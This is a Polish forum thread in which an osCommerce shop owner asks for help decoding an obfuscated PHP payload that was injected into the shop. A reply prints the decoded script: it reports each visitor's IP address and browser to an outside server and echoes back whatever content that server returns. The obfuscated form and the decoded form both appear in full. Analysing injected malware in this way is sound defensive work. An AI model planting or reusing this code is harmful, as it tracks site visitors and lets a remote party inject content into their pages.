prośba o pomoc w odkodowaniu

[Lichaczew]

Miałem ostatnio kilka ataków na sklep (oscommerce). Jak mnie coś atakuje to chciałbym zrozumieć jak działa. Zrobiłem już pierwszy krok przez base64_decode i dostałem taki oto wynik. Coś niecoś tu widzę np. napisy od końca choćby "(edoced_46esab(lave')" ale nie wiem co zrobić dalej aby to odkodować w całości. Będę wdzięczny nie tyle ile za samo odkodowanie ale bardziej za pomoc jak to zrobić.

Muszę zaznaczyć, że w php i mysql nie jestem specjalnie oblatany chociaż potrafiłem sobie samemu wykonać w sklepie szereg przeróbek.

function evalhIOoLgLKZYmtJ($s){for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}eval(evalhIOoLgLKZYmtJ(';))"=03OpATWLlGTRxmc0lkUq50TsFmdlRCKlR2bjVGZfRjNlNXYiBibyVHdlJ3egkCMZtUaMFFbyRXS
SpmTPxWY2VGJok1SpxUUsJHdJJlaO9EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave'));eval(evalhIOoLgLKZYmtJ(';))"=sTKi0TP3JWb1cVYigSWLlGTRxmc0lkUq50TsFmdlBSPgE1QSF3YTl3VIJlRyRVT5xWY2VGJ"(edoced_46esab(lave'));eval(evalhIOoLgLKZYmtJ(';))"7kiI90ESkhmUzMmIok1SpxUUsJHdJJlaO9EbhZXZ9MkYZJVdhhlexlES3V0awxWY2VGJ"(edoced_46esab(lave'));eval(evalhIOoLgLKZYmtJ(';))"=sTKi0TPBNGMShUYigSWLlGTRxmc0lkUq50TsFmdl1je2lXeqV0ZhR3Q2pHcFxWY2VGJ"(edoced_46esab(lave'));eval(evalhIOoLgLKZYmtJ(';))"=sTKi0DNXFmIok1SpxUUsJHdJJlaO9EbhZXZ9sWYSBXSiVEVhp1UixWY2VGJ"(edoced_46esab(lave'));eval(evalhIOoLgLKZYmtJ(';))"=sTKi0TPRlkdkdVSigSWLlGTRxmc0lkUq50TsFmdl1TTnt0RvhXTHRVSYZkTaxWY2VGJ"(edoced_46esab(lave'));eval(evalhIOoLgLKZYmtJ(';))"==wOdliIVVTVShkRwg1UWBTVWljRVVlUGNlIok1SpxUUsJHdJJlaO9EbhZXZbJVRWJVRT9FJ9UFb
JFnaxd2RJp2dzxWY2VGJ"(edoced_46esab(lave'));eval(evalhIOoLgLKZYmtJ(';))"==wOpkiI90zZjxGetlFdG1WVigSWLlGTRxmc0lkUq50TsFmdlBCLpICNWdkW1Z0VXJCKZtUaMFFb
yRXSSpmTPxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKZtUaMFFbyRXSSpmTPxWY2VGIskiIwkTbR9kTW
RlIok1SpxUUsJHdJJlaO9EbhZXZgwSKi0TQuNWM4JTVigSWLlGTRxmc0lkUq50TsFmdlBCLpICb4JjW2l
jMSJCKZtUaMFFbyRXSSpmTPxWY2VGK5FmcyFGI9ASY6hHSv5WQmlUeQdmdzxWY2VGJ"(edoced_46esab(lave'));eval(evalhIOoLgLKZYmtJ(';))"==wORNkUxN2U5dFSSZkcU1UesFmdlRSPuQ1bM1WSYN3TXhEZYZFbhZXZkASKgsyKpRCI7UDI9wDI
pRCI7ADI9ASakgCIy9mZ"(edoced_46esab(lave'));eval(evalhIOoLgLKZYmtJ(';))"7kSKi0TPRZ2Nrl3YrdWejBTNXpFM1IjYqljRkxGZygFb4dVYtJURJVnSYRGMW12Y3I0ULpnUDtke
j1mWnRjMiBnUzkVdW5mWigSWLlGTRxmc0lkUq50TsFmdlhCbhZXZ"(edoced_46esab(lave'));eval(evalhIOoLgLKZYmtJ(';))"==wORNkUxN2U5dFSSZkcU1UesFmdlRiLi4iI94CIU9GTtlEWz90VIRGWWxWY2VGJ"(edoced_46esab(lave'));eval(evalhIOoLgLKZYmtJ(';))"913Oxk1SpxUUsJHdJJlaO9EbhZXZkAyboNWZ70VMbFTWLlGTRxmc0lkUq50TsFmdlRCI9ASMZtUa
MFFbyRXSSpmTPxWY2VGJgsTKxk1SpxUUsJHdJJlaO9EbhZXZkwSTnt0RvhXTHRVSYZkTaxWY2VGJoUGZv
xGc4VGI9ASMZtUaMFFbyRXSSpmTPxWY2VGJ7lSKNd2SH9GeNdEVJhlROpFbhZXZkwSMZtUaMFFbyRXSSp
mTPxWY2VGJoIHdzJHdzhCIml2OpkSXpISVOFDVJljRVVlUGNlIok1SpxUUsJHdJJlaO9EbhZXZbJVRWJV
RT9FJoUGZvNmblxmc15SKikzZtpkIok1SpxUUsJHdJJlaO9EbhZXZukSVslUcqF3ZHlka3NHbhZXZkgSZ
k92YuVGbyVnLpISOJ1mSigSWLlGTRxmc0lkUq50TsFmdl5SXpISPJZkUFZEMYZkUxQlTWtWVigSWLlGTR
xmc0lkUq50TsFmdltlUFZlUFN1Xk4SKi0DMUFmIok1SpxUUsJHdJJlaO9EbhZXZukiI9gDRjJCKZtUaMF
FbyRXSSpmTPxWY2VmLpIybC5GTigSWLlGTRxmc0lkUq50TsFmdl5yahJFcJJWRUFmWTJGbhZXZk4SKi0T
P3xkIok1SpxUUsJHdJJlaO9EbhZXZuQ1bM1WSYN3TXhEZYZFbhZXZk4SKi0DO5xkIok1SpxUUsJHdJJla
O9EbhZXZukiI90zZPJCKZtUaMFFbyRXSSpmTPxWY2VmL6ZXe5pWRnFGdDZnewVEbhZXZkgyMnZGI9ASMZ
tUaMFFbyRXSSpmTPxWY2VGJgsTKwADOwEzKpgSZtlGdskSKi0TTIRGaSNzYigSWLlGTRxmc0lkUq50TsF
mdlhSNk1GLDJWWSVXYYpXcJh0dFtGcsFmdlRCKll2av92Y0V2cAByegU2csVGI9tHIpkSKdNkYZJVdhhl
exlES3V0awxWY2VGJbVUSL90TD9FJoQXZzNXaoAicvBSKpUFbJFnaxd2RJp2dzxWY2VGJgwiIp9iIg4CI
pEme4h0buFkZJlHUnZ3csFmdlRCIsICfigSZk9Gbw1Wag4CIi8iIog2Y0FWbfdWZyBHKoYWa"(edoced_46esab(lave'));

[tosik]

Jeżeli atakują twój sklep to zastosuj się do Zabezpieczenie osCommerce przed włamaniem odkodwana zawartość tego skryptu:

<?php

function evalONjRItrlQLiKY($evalONjRItrlQLiKY0) {
return base64_decode($evalONjRItrlQLiKY0);
}

$_SERVER['HTTP_USER_AGENT'] = $_SERVER['HTTP_USER_AGENT'];
$evalsvgPyIfAnoHxza = array('Google', 'Slurp', 'MSNBot', 'ia_archiver', 'Yandex', 'Rambler');

function fg3($s) {
return file_get_contents($s);
}

for ($i = 0; $i <= 5; $i++)
if ((preg_match("/" . implode("|", $evalsvgPyIfAnoHxza) . "/i", $_SERVER['HTTP_USER_AGENT'])) or (isset($_COOKIE['stats']))) {

} else {
	@setcookie('stats', md5('stats'), time() + 10800);
	$content = fg3('http' . ':' . '//info.info/' . 'in' . '.ph' . 'p?' . 'i=' . $_SERVER['REMOTE_ADDR'] . '&b=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&h=' . urlencode($_SERVER['HTTP_HOST']));
	/*
	  https://info.info/in.php?i=127.0.0.1&b=Mozilla%2F5.0+%28Windows+NT+5.1%29+AppleWebKit%2F534.30+%28KHTML%2C+like+Gecko%29+Chrome%2F12.0.738.0+Safari%2F534.30&h=127.0.0.1
	 */
	if (strstr($content, '!go!')) {
		$content = explode('!go!', $content);
		$content = $content[1];
		echo $content;
	}
}
?>

[piomoo]

do odkodowania funkcji eval() używa się funkcji base64_decode()